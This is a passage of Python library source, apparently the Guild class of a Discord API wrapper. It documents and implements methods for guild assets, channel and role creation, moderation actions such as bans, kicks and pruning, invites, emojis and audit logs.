If the format is ``None``, then it is automatically
detected into either 'gif' or static_format depending on the
icon being animated or not.
static_format: Optional[:class:`str`]
Format to attempt to convert only non-animated icons to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_icon(self._state, self, format=format, static_format=static_format, size=size)
@property
def banner_url(self):
""":class:`Asset`: Returns the guild's banner asset."""
return self.banner_url_as()
def banner_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's banner.
The format must be one of 'webp', 'jpeg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the banner to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.banner, 'banners', format=format, size=size)
@property
def splash_url(self):
""":class:`Asset`: Returns the guild's invite splash asset."""
return self.splash_url_as()
def splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's invite splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.splash, 'splashes', format=format, size=size)
@property
def discovery_splash_url(self):
""":class:`Asset`: Returns the guild's discovery splash asset.
.. versionadded:: 1.3
"""
return self.discovery_splash_url_as()
def discovery_splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's discovery splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
.. versionadded:: 1.3
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.discovery_splash, 'discovery-splashes', format=format, size=size)
@property
def member_count(self):
""":class:`int`: Returns the true member count regardless of it being loaded fully or not.
.. warning::
Due to a Discord limitation, in order for this attribute to remain up-to-date and
accurate, it requires :attr:`Intents.members` to be specified.
"""
return self._member_count
@property
def chunked(self):
""":class:`bool`: Returns a boolean indicating if the guild is "chunked".
A chunked guild means that :attr:`member_count` is equal to the
number of members stored in the internal :attr:`members` cache.
If this value returns ``False``, then you should request for
offline members.
"""
count = getattr(self, '_member_count', None)
if count is None:
return False
return count == len(self._members)
@property
def shard_id(self):
""":class:`int`: Returns the shard ID for this guild if applicable."""
count = self._state.shard_count
if count is None:
return None
return (self.id >> 22) % count
@property
def created_at(self):
""":class:`datetime.datetime`: Returns the guild's creation time in UTC."""
return utils.snowflake_time(self.id)
def get_member_named(self, name):
"""Returns the first member found that matches the name provided.
The name can have an optional discriminator argument, e.g. "Jake#0001"
or "Jake" will both do the lookup. However the former will give a more
precise result. Note that the discriminator must have all 4 digits
for this to work.
If a nickname is passed, then it is looked up via the nickname. Note
however, that a nickname + discriminator combo will not lookup the nickname
but rather the username + discriminator combo due to nickname + discriminator
not being unique.
If no member is found, ``None`` is returned.
Parameters
-----------
name: :class:`str`
The name of the member to lookup with an optional discriminator.
Returns
--------
Optional[:class:`Member`]
The member in this guild with the associated name. If not found
then ``None`` is returned.
"""
result = None
members = self.members
if len(name) > 5 and name[-5] == '#':
# The 5 length is checking to see if #0000 is in the string,
# as a#0000 has a length of 6, the minimum for a potential
# discriminator lookup.
potential_discriminator = name[-4:]
# do the actual lookup and return if found
# if it isn't found then we'll do a full name lookup below.
result = utils.get(members, name=name[:-5], discriminator=potential_discriminator)
if result is not None:
return result
def pred(m):
return m.nick == name or m.name == name
return utils.find(pred, members)
def _create_channel(self, name, overwrites, channel_type, category=None, **options):
if overwrites is None:
overwrites = {}
elif not isinstance(overwrites, dict):
raise InvalidArgument('overwrites parameter expects a dict.')
perms = []
for target, perm in overwrites.items():
if not isinstance(perm, PermissionOverwrite):
raise InvalidArgument(f'Expected PermissionOverwrite received {perm.__class__.__name__}')
allow, deny = perm.pair()
payload = {
'allow': allow.value,
'deny': deny.value,
'id': target.id
}
if isinstance(target, Role):
payload['type'] = abc._Overwrites.ROLE
else:
payload['type'] = abc._Overwrites.MEMBER
perms.append(payload)
try:
options['rate_limit_per_user'] = options.pop('slowmode_delay')
except KeyError:
pass
try:
rtc_region = options.pop('rtc_region')
except KeyError:
pass
else:
options['rtc_region'] = None if rtc_region is None else str(rtc_region)
parent_id = category.id if category else None
return self._state.http.create_channel(self.id, channel_type.value, name=name, parent_id=parent_id,
permission_overwrites=perms, **options)
async def create_text_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
Creates a :class:`TextChannel` for the guild.
Note that you need the :attr:`~Permissions.manage_channels` permission
to create the channel.
The ``overwrites`` parameter can be used to create a 'secret'
channel upon creation. This parameter expects a :class:`dict` of
overwrites with the target (either a :class:`Member` or a :class:`Role`)
as the key and a :class:`PermissionOverwrite` as the value.
.. note::
Creating a channel of a specified position will not update the position of
other channels to follow suit. A follow-up call to :meth:`~TextChannel.edit`
will be required to update the position of the channel in the channel list.
Examples
----------
Creating a basic channel:
.. code-block:: python3
channel = await guild.create_text_channel('cool-channel')
Creating a "secret" channel:
.. code-block:: python3
overwrites = {
guild.default_role: discord.PermissionOverwrite(read_messages=False),
guild.me: discord.PermissionOverwrite(read_messages=True)
}
channel = await guild.create_text_channel('secret', overwrites=overwrites)
Parameters
-----------
name: :class:`str`
The channel's name.
overwrites
A :class:`dict` of target (either a role or a member) to
:class:`PermissionOverwrite` to apply upon creation of a channel.
Useful for creating secret channels.
category: Optional[:class:`CategoryChannel`]
The category to place the newly created channel under.
The permissions will be automatically synced to category if no
overwrites are provided.
position: :class:`int`
The position in the channel list. This is a number that starts
at 0. e.g. the top channel is position 0.
topic: Optional[:class:`str`]
The new channel's topic.
slowmode_delay: :class:`int`
Specifies the slowmode rate limit for user in this channel, in seconds.
The maximum value possible is `21600`.
nsfw: :class:`bool`
To mark the channel as NSFW or not.
reason: Optional[:class:`str`]
The reason for creating this channel. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`TextChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.text, category, reason=reason, **options)
channel = TextChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_voice_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
This is similar to :meth:`create_text_channel` except makes a :class:`VoiceChannel` instead, in addition
to having the following new parameters.
Parameters
-----------
bitrate: :class:`int`
The channel's preferred audio bitrate in bits per second.
user_limit: :class:`int`
The channel's limit for number of members that can be in a voice channel.
rtc_region: Optional[:class:`VoiceRegion`]
The region for the voice channel's voice communication.
A value of ``None`` indicates automatic voice region detection.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`VoiceChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.voice, category, reason=reason, **options)
channel = VoiceChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_stage_channel(self, name, *, topic=None, category=None, overwrites=None, reason=None, position=None):
"""|coro|
This is similar to :meth:`create_text_channel` except makes a :class:`StageChannel` instead.
.. note::
The ``slowmode_delay`` and ``nsfw`` parameters are not supported in this function.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`StageChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.stage_voice, category, reason=reason, position=position, topic=topic)
channel = StageChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_category(self, name, *, overwrites=None, reason=None, position=None):
"""|coro|
Same as :meth:`create_text_channel` except makes a :class:`CategoryChannel` instead.
.. note::
The ``category`` parameter is not supported in this function since categories
cannot have categories.
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`CategoryChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.category, reason=reason, position=position)
channel = CategoryChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
create_category_channel = create_category
async def leave(self):
"""|coro|
Leaves the guild.
.. note::
You cannot leave the guild that you own, you must delete it instead
via :meth:`delete`.
Raises
--------
HTTPException
Leaving the guild failed.
"""
await self._state.http.leave_guild(self.id)
async def delete(self):
"""|coro|
Deletes the guild. You must be the guild owner to delete the
guild.
Raises
--------
HTTPException
Deleting the guild failed.
Forbidden
You do not have permissions to delete the guild.
"""
await self._state.http.delete_guild(self.id)
async def edit(self, *, reason=None, **fields):
"""|coro|
Edits the guild.
You must have the :attr:`~Permissions.manage_guild` permission
to edit the guild.
.. versionchanged:: 1.4
The `rules_channel` and `public_updates_channel` keyword-only parameters were added.
Parameters
----------
name: :class:`str`
The new name of the guild.
description: :class:`str`
The new description of the guild. This is only available to guilds that
contain ``PUBLIC`` in :attr:`Guild.features`.
icon: :class:`bytes`
A :term:`py:bytes-like object` representing the icon. Only PNG/JPEG supported
and GIF This is only available to guilds that contain ``ANIMATED_ICON`` in :attr:`Guild.features`.
Could be ``None`` to denote removal of the icon.
banner: :class:`bytes`
A :term:`py:bytes-like object` representing the banner.
Could be ``None`` to denote removal of the banner.
splash: :class:`bytes`
A :term:`py:bytes-like object` representing the invite splash.
Only PNG/JPEG supported. Could be ``None`` to denote removing the
splash. This is only available to guilds that contain ``INVITE_SPLASH``
in :attr:`Guild.features`.
region: :class:`VoiceRegion`
The new region for the guild's voice communication.
afk_channel: Optional[:class:`VoiceChannel`]
The new channel that is the AFK channel. Could be ``None`` for no AFK channel.
afk_timeout: :class:`int`
The number of seconds until someone is moved to the AFK channel.
owner: :class:`Member`
The new owner of the guild to transfer ownership to. Note that you must
be owner of the guild to do this.
verification_level: :class:`VerificationLevel`
The new verification level for the guild.
default_notifications: :class:`NotificationLevel`
The new default notification level for the guild.
explicit_content_filter: :class:`ContentFilter`
The new explicit content filter for the guild.
vanity_code: :class:`str`
The new vanity code for the guild.
system_channel: Optional[:class:`TextChannel`]
The new channel that is used for the system channel. Could be ``None`` for no system channel.
system_channel_flags: :class:`SystemChannelFlags`
The new system channel settings to use with the new system channel.
preferred_locale: :class:`str`
The new preferred locale for the guild. Used as the primary language in the guild.
If set, this must be an ISO 639 code, e.g. ``en-US`` or ``ja`` or ``zh-CN``.
rules_channel: Optional[:class:`TextChannel`]
The new channel that is used for rules. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no rules
channel.
public_updates_channel: Optional[:class:`TextChannel`]
The new channel that is used for public updates from Discord. This is only available to
guilds that contain ``PUBLIC`` in :attr:`Guild.features`. Could be ``None`` for no
public updates channel.
reason: Optional[:class:`str`]
The reason for editing this guild. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to edit the guild.
HTTPException
Editing the guild failed.
InvalidArgument
The image format passed in to ``icon`` is invalid. It must be
PNG or JPG. This is also raised if you are not the owner of the
guild and request an ownership transfer.
"""
http = self._state.http
try:
icon_bytes = fields['icon']
except KeyError:
icon = self.icon
else:
if icon_bytes is not None:
icon = utils._bytes_to_base64_data(icon_bytes)
else:
icon = None
try:
banner_bytes = fields['banner']
except KeyError:
banner = self.banner
else:
if banner_bytes is not None:
banner = utils._bytes_to_base64_data(banner_bytes)
else:
banner = None
try:
vanity_code = fields['vanity_code']
except KeyError:
pass
else:
await http.change_vanity_code(self.id, vanity_code, reason=reason)
try:
splash_bytes = fields['splash']
except KeyError:
splash = self.splash
else:
if splash_bytes is not None:
splash = utils._bytes_to_base64_data(splash_bytes)
else:
splash = None
fields['icon'] = icon
fields['banner'] = banner
fields['splash'] = splash
default_message_notifications = fields.get('default_notifications', self.default_notifications)
if not isinstance(default_message_notifications, NotificationLevel):
raise InvalidArgument('default_notifications field must be of type NotificationLevel')
fields['default_message_notifications'] = default_message_notifications.value
try:
afk_channel = fields.pop('afk_channel')
except KeyError:
pass
else:
if afk_channel is None:
fields['afk_channel_id'] = afk_channel
else:
fields['afk_channel_id'] = afk_channel.id
try:
system_channel = fields.pop('system_channel')
except KeyError:
pass
else:
if system_channel is None:
fields['system_channel_id'] = system_channel
else:
fields['system_channel_id'] = system_channel.id
if 'owner' in fields:
if self.owner_id != self._state.self_id:
raise InvalidArgument('To transfer ownership you must be the owner of the guild.')
fields['owner_id'] = fields['owner'].id
if 'region' in fields:
fields['region'] = str(fields['region'])
level = fields.get('verification_level', self.verification_level)
if not isinstance(level, VerificationLevel):
raise InvalidArgument('verification_level field must be of type VerificationLevel')
fields['verification_level'] = level.value
explicit_content_filter = fields.get('explicit_content_filter', self.explicit_content_filter)
if not isinstance(explicit_content_filter, ContentFilter):
raise InvalidArgument('explicit_content_filter field must be of type ContentFilter')
fields['explicit_content_filter'] = explicit_content_filter.value
system_channel_flags = fields.get('system_channel_flags', self.system_channel_flags)
if not isinstance(system_channel_flags, SystemChannelFlags):
raise InvalidArgument('system_channel_flags field must be of type SystemChannelFlags')
fields['system_channel_flags'] = system_channel_flags.value
try:
rules_channel = fields.pop('rules_channel')
except KeyError:
pass
else:
if rules_channel is None:
fields['rules_channel_id'] = rules_channel
else:
fields['rules_channel_id'] = rules_channel.id
try:
public_updates_channel = fields.pop('public_updates_channel')
except KeyError:
pass
else:
if public_updates_channel is None:
fields['public_updates_channel_id'] = public_updates_channel
else:
fields['public_updates_channel_id'] = public_updates_channel.id
await http.edit_guild(self.id, reason=reason, **fields)
async def fetch_channels(self):
"""|coro|
Retrieves all :class:`abc.GuildChannel` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`channels` instead.
.. versionadded:: 1.2
Raises
-------
InvalidData
An unknown channel type was received from Discord.
HTTPException
Retrieving the channels failed.
Returns
-------
List[:class:`abc.GuildChannel`]
All channels in the guild.
"""
data = await self._state.http.get_all_guild_channels(self.id)
def convert(d):
factory, ch_type = _channel_factory(d['type'])
if factory is None:
raise InvalidData('Unknown channel type {type} for channel ID {id}.'.format_map(data))
channel = factory(guild=self, state=self._state, data=d)
return channel
return [convert(d) for d in data]
def fetch_members(self, *, limit=1000, after=None):
"""Retrieves an :class:`.AsyncIterator` that enables receiving the guild's members. In order to use this,
:meth:`Intents.members` must be enabled.
.. note::
This method is an API call. For general usage, consider :attr:`members` instead.
.. versionadded:: 1.3
All parameters are optional.
Parameters
----------
limit: Optional[:class:`int`]
The number of members to retrieve. Defaults to 1000.
Pass ``None`` to fetch all members. Note that this is potentially slow.
after: Optional[Union[:class:`.abc.Snowflake`, :class:`datetime.datetime`]]
Retrieve members after this date or object.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
Raises
------
ClientException
The members intent is not enabled.
HTTPException
Getting the members failed.
Yields
------
:class:`.Member`
The member with the member data parsed.
Examples
--------
Usage ::
async for member in guild.fetch_members(limit=150):
print(member.name)
Flattening into a list ::
members = await guild.fetch_members(limit=150).flatten()
# members is now a list of Member...
"""
if not self._state._intents.members:
raise ClientException('Intents.members must be enabled to use this.')
return MemberIterator(self, limit=limit, after=after)
async def fetch_member(self, member_id):
"""|coro|
Retrieves a :class:`Member` from a guild ID, and a member ID.
.. note::
This method is an API call. For general usage, consider :meth:`get_member` instead.
Parameters
-----------
member_id: :class:`int`
The member's ID to fetch from.
Raises
-------
Forbidden
You do not have access to the guild.
HTTPException
Fetching the member failed.
Returns
--------
:class:`Member`
The member from the member ID.
"""
data = await self._state.http.get_member(self.id, member_id)
return Member(data=data, state=self._state, guild=self)
async def fetch_ban(self, user):
"""|coro|
Retrieves the :class:`BanEntry` for a user.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to get ban information from.
Raises
------
Forbidden
You do not have proper permissions to get the information.
NotFound
This user is not banned.
HTTPException
An error occurred while fetching the information.
Returns
-------
:class:`BanEntry`
The :class:`BanEntry` object for the specified user.
"""
data: BanPayload = await self._state.http.get_ban(user.id, self.id)
return BanEntry(
user=User(state=self._state, data=data['user']),
reason=data['reason']
)
async def bans(self):
"""|coro|
Retrieves all the users that are banned from the guild as a :class:`list` of :class:`BanEntry`.
You must have the :attr:`~Permissions.ban_members` permission
to get this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
--------
List[:class:`BanEntry`]
A list of :class:`BanEntry` objects.
"""
data: List[BanPayload] = await self._state.http.get_bans(self.id)
return [BanEntry(user=User(state=self._state, data=e['user']),
reason=e['reason'])
for e in data]
async def prune_members(self, *, days, compute_prune_count=True, roles=None, reason=None):
r"""|coro|
Prunes the guild from its inactive members.
The inactive members are denoted if they have not logged on in
``days`` number of days and they have no roles.
You must have the :attr:`~Permissions.kick_members` permission
to use this.
To check how many members you would prune without actually pruning,
see the :meth:`estimate_pruned_members` function.
To prune members that have specific roles see the ``roles`` parameter.
.. versionchanged:: 1.4
The ``roles`` keyword-only parameter was added.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
compute_prune_count: :class:`bool`
Whether to compute the prune count. This defaults to ``True``
which makes it prone to timeouts in very large guilds. In order
to prevent timeouts, you must set this to ``False``. If this is
set to ``False``\, then this function will always return ``None``.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the pruning process. If a member
has a role that is not specified, they'll be excluded.
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while pruning members.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
Optional[:class:`int`]
The number of members pruned. If ``compute_prune_count`` is ``False``
then this returns ``None``.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.prune_members(self.id, days, compute_prune_count=compute_prune_count, roles=roles, reason=reason)
return data['pruned']
async def templates(self):
"""|coro|
Gets the list of templates from this guild.
Requires :attr:`~.Permissions.manage_guild` permissions.
.. versionadded:: 1.7
Raises
-------
Forbidden
You don't have permissions to get the templates.
Returns
--------
List[:class:`Template`]
The templates for this guild.
"""
from .template import Template
data = await self._state.http.guild_templates(self.id)
return [Template(data=d, state=self._state) for d in data]
async def webhooks(self):
"""|coro|
Gets the list of webhooks from this guild.
Requires :attr:`~.Permissions.manage_webhooks` permissions.
Raises
-------
Forbidden
You don't have permissions to get the webhooks.
Returns
--------
List[:class:`Webhook`]
The webhooks for this guild.
"""
from .webhook import Webhook
data = await self._state.http.guild_webhooks(self.id)
return [Webhook.from_state(d, state=self._state) for d in data]
async def estimate_pruned_members(self, *, days, roles=None):
"""|coro|
Similar to :meth:`prune_members` except instead of actually
pruning members, it returns how many members it would prune
from the guild had it been called.
Parameters
-----------
days: :class:`int`
The number of days before counting as inactive.
roles: Optional[List[:class:`abc.Snowflake`]]
A list of :class:`abc.Snowflake` that represent roles to include in the estimate. If a member
has a role that is not specified, they'll be excluded.
.. versionadded:: 1.7
Raises
-------
Forbidden
You do not have permissions to prune members.
HTTPException
An error occurred while fetching the prune members estimate.
InvalidArgument
An integer was not passed for ``days``.
Returns
---------
:class:`int`
The number of members estimated to be pruned.
"""
if not isinstance(days, int):
raise InvalidArgument(f'Expected int for ``days``, received {days.__class__.__name__} instead.')
if roles:
roles = [str(role.id) for role in roles]
data = await self._state.http.estimate_pruned_members(self.id, days, roles)
return data['pruned']
async def invites(self) -> List[Invite]:
"""|coro|
Returns a list of all active instant invites from the guild.
You must have the :attr:`~Permissions.manage_guild` permission to get
this information.
Raises
-------
Forbidden
You do not have proper permissions to get the information.
HTTPException
An error occurred while fetching the information.
Returns
-------
List[:class:`Invite`]
The list of invites that are currently active.
"""
data = await self._state.http.invites_from(self.id)
result = []
for invite in data:
channel = self.get_channel(int(invite['channel']['id']))
invite['channel'] = channel
invite['guild'] = self
result.append(Invite(state=self._state, data=invite))
return result
async def create_template(self, *, name, description=None):
"""|coro|
Creates a template for the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.7
Parameters
-----------
name: :class:`str`
The name of the template.
description: Optional[:class:`str`]
The description of the template.
"""
from .template import Template
payload = {
'name': name
}
if description:
payload['description'] = description
data = await self._state.http.create_template(self.id, payload)
return Template(state=self._state, data=data)
async def create_integration(self, *, type, id):
"""|coro|
Attaches an integration to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Parameters
-----------
type: :class:`str`
The integration type (e.g. Twitch).
id: :class:`int`
The integration ID.
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
The account could not be found.
"""
await self._state.http.create_integration(self.id, type, id)
async def integrations(self):
"""|coro|
Returns a list of all integrations attached to the guild.
You must have the :attr:`~Permissions.manage_guild` permission to
do this.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permission to create the integration.
HTTPException
Fetching the integrations failed.
Returns
--------
List[:class:`Integration`]
The list of integrations that are attached to the guild.
"""
data = await self._state.http.get_all_integrations(self.id)
return [Integration(guild=self, data=d) for d in data]
async def fetch_emojis(self):
r"""|coro|
Retrieves all custom :class:`Emoji`\s from the guild.
.. note::
This method is an API call. For general usage, consider :attr:`emojis` instead.
Raises
---------
HTTPException
An error occurred fetching the emojis.
Returns
--------
List[:class:`Emoji`]
The retrieved emojis.
"""
data = await self._state.http.get_all_custom_emojis(self.id)
return [Emoji(guild=self, state=self._state, data=d) for d in data]
async def fetch_emoji(self, emoji_id):
"""|coro|
Retrieves a custom :class:`Emoji` from the guild.
.. note::
This method is an API call.
For general usage, consider iterating over :attr:`emojis` instead.
Parameters
-------------
emoji_id: :class:`int`
The emoji's ID.
Raises
---------
NotFound
The emoji requested could not be found.
HTTPException
An error occurred fetching the emoji.
Returns
--------
:class:`Emoji`
The retrieved emoji.
"""
data = await self._state.http.get_custom_emoji(self.id, emoji_id)
return Emoji(guild=self, state=self._state, data=data)
async def create_custom_emoji(self, *, name, image, roles=None, reason=None):
r"""|coro|
Creates a custom :class:`Emoji` for the guild.
There is currently a limit of 50 static and animated emojis respectively per guild,
unless the guild has the ``MORE_EMOJI`` feature which extends the limit to 200.
You must have the :attr:`~Permissions.manage_emojis` permission to
do this.
Parameters
-----------
name: :class:`str`
The emoji name. Must be at least 2 characters.
image: :class:`bytes`
The :term:`py:bytes-like object` representing the image data to use.
Only JPG, PNG and GIF images are supported.
roles: Optional[List[:class:`Role`]]
A :class:`list` of :class:`Role`\s that can use this emoji. Leave empty to make it available to everyone.
reason: Optional[:class:`str`]
The reason for creating this emoji. Shows up on the audit log.
Raises
-------
Forbidden
You are not allowed to create emojis.
HTTPException
An error occurred creating an emoji.
Returns
--------
:class:`Emoji`
The created emoji.
"""
img = utils._bytes_to_base64_data(image)
if roles:
roles = [role.id for role in roles]
data = await self._state.http.create_custom_emoji(self.id, name, img, roles=roles, reason=reason)
return self._state.store_emoji(self, data)
async def fetch_roles(self):
"""|coro|
Retrieves all :class:`Role` that the guild has.
.. note::
This method is an API call. For general usage, consider :attr:`roles` instead.
.. versionadded:: 1.3
Raises
-------
HTTPException
Retrieving the roles failed.
Returns
-------
List[:class:`Role`]
All roles in the guild.
"""
data = await self._state.http.get_roles(self.id)
return [Role(guild=self, state=self._state, data=d) for d in data]
async def create_role(self, *, reason=None, **fields):
"""|coro|
Creates a :class:`Role` for the guild.
All fields are optional.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionchanged:: 1.6
Can now pass ``int`` to ``colour`` keyword-only parameter.
Parameters
-----------
name: :class:`str`
The role name. Defaults to 'new role'.
permissions: :class:`Permissions`
The permissions to have. Defaults to no permissions.
colour: Union[:class:`Colour`, :class:`int`]
The colour for the role. Defaults to :meth:`Colour.default`.
This is aliased to ``color`` as well.
hoist: :class:`bool`
Indicates if the role should be shown separately in the member list.
Defaults to ``False``.
mentionable: :class:`bool`
Indicates if the role should be mentionable by others.
Defaults to ``False``.
reason: Optional[:class:`str`]
The reason for creating this role. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to create the role.
HTTPException
Creating the role failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
:class:`Role`
The newly created role.
"""
try:
perms = fields.pop('permissions')
except KeyError:
fields['permissions'] = '0'
else:
fields['permissions'] = str(perms.value)
try:
colour = fields.pop('colour')
except KeyError:
colour = fields.get('color', Colour.default())
finally:
if isinstance(colour, int):
colour = Colour(value=colour)
fields['color'] = colour.value
valid_keys = ('name', 'permissions', 'color', 'hoist', 'mentionable')
for key in fields:
if key not in valid_keys:
raise InvalidArgument(f'{key!r} is not a valid field.')
data = await self._state.http.create_role(self.id, reason=reason, **fields)
role = Role(guild=self, data=data, state=self._state)
# TODO: add to cache
return role
async def edit_role_positions(self, positions, *, reason=None):
"""|coro|
Bulk edits a list of :class:`Role` in the guild.
You must have the :attr:`~Permissions.manage_roles` permission to
do this.
.. versionadded:: 1.4
Example:
.. code-block:: python3
positions = {
bots_role: 1, # penultimate role
tester_role: 2,
admin_role: 6
}
await guild.edit_role_positions(positions=positions)
Parameters
-----------
positions
A :class:`dict` of :class:`Role` to :class:`int` to change the positions
of each given role.
reason: Optional[:class:`str`]
The reason for editing the role positions. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to move the roles.
HTTPException
Moving the roles failed.
InvalidArgument
An invalid keyword argument was given.
Returns
--------
List[:class:`Role`]
A list of all the roles in the guild.
"""
if not isinstance(positions, dict):
raise InvalidArgument('positions parameter expects a dict.')
role_positions = []
for role, position in positions.items():
payload = {
'id': role.id,
'position': position
}
role_positions.append(payload)
data = await self._state.http.move_role_position(self.id, role_positions, reason=reason)
roles = []
for d in data:
role = Role(guild=self, data=d, state=self._state)
roles.append(role)
self._roles[role.id] = role
return roles
async def kick(self, user, *, reason=None):
"""|coro|
Kicks a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.kick_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to kick from their guild.
reason: Optional[:class:`str`]
The reason the user got kicked.
Raises
-------
Forbidden
You do not have the proper permissions to kick.
HTTPException
Kicking failed.
"""
await self._state.http.kick(user.id, self.id, reason=reason)
async def ban(self, user, *, reason=None, delete_message_days=1):
"""|coro|
Bans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to ban from their guild.
delete_message_days: :class:`int`
The number of days worth of messages to delete from the user
in the guild. The minimum is 0 and the maximum is 7.
reason: Optional[:class:`str`]
The reason the user got banned.
Raises
-------
Forbidden
You do not have the proper permissions to ban.
HTTPException
Banning failed.
"""
await self._state.http.ban(user.id, self.id, delete_message_days, reason=reason)
async def unban(self, user, *, reason=None):
"""|coro|
Unbans a user from the guild.
The user must meet the :class:`abc.Snowflake` abc.
You must have the :attr:`~Permissions.ban_members` permission to
do this.
Parameters
-----------
user: :class:`abc.Snowflake`
The user to unban.
reason: Optional[:class:`str`]
The reason for doing this action. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to unban.
HTTPException
Unbanning failed.
"""
await self._state.http.unban(user.id, self.id, reason=reason)
async def vanity_invite(self) -> Invite:
"""|coro|
Returns the guild's special vanity invite.
The guild must have ``VANITY_URL`` in :attr:`~Guild.features`.
You must have the :attr:`~Permissions.manage_guild` permission to use
this as well.
Raises
-------
Forbidden
You do not have the proper permissions to get this.
HTTPException
Retrieving the vanity invite failed.
Returns
--------
:class:`Invite`
The special vanity invite.
"""
# we start with { code: abc }
payload = await self._state.http.get_vanity_code(self.id)
# get the vanity URL channel since default channels aren't
# reliable or a thing anymore
data = await self._state.http.get_invite(payload['code'])
payload['guild'] = self
payload['channel'] = self.get_channel(int(data['channel']['id']))
payload['revoked'] = False
payload['temporary'] = False
payload['max_uses'] = 0
payload['max_age'] = 0
return Invite(state=self._state, data=payload)
def audit_logs(self, *, limit=100, before=None, after=None, oldest_first=None, user=None, action=None):
"""Returns an :class:`AsyncIterator` that enables receiving the guild's audit logs.
You must have the :attr:`~Permissions.view_audit_log` permission to use this.
Examples
----------
Getting the first 100 entries: ::
async for entry in guild.audit_logs(limit=100):
print(f'{entry.user} did {entry.action} to {entry.target}')
Getting entries for a specific action: ::
async for entry in guild.audit_logs(action=discord.AuditLogAction.ban):
print(f'{entry.user} banned {entry.target}')
Getting entries made by a specific user: ::
entries = await guild.audit_logs(limit=None, user=guild.me).flatten()
await channel.send(f'I made {len(entries)} moderation actions.')
Parameters
-----------
limit: Optional[:class:`int`]
The number of entries to retrieve. If ``None`` retrieve all entries.
before: Union[:class:`abc.Snowflake`, :class:`datetime.datetime`]
Retrieve entries before this date or entry.
If a datetime is provided, it is recommended to use a UTC aware datetime.
If the datetime is naive, it is assumed to be local time.
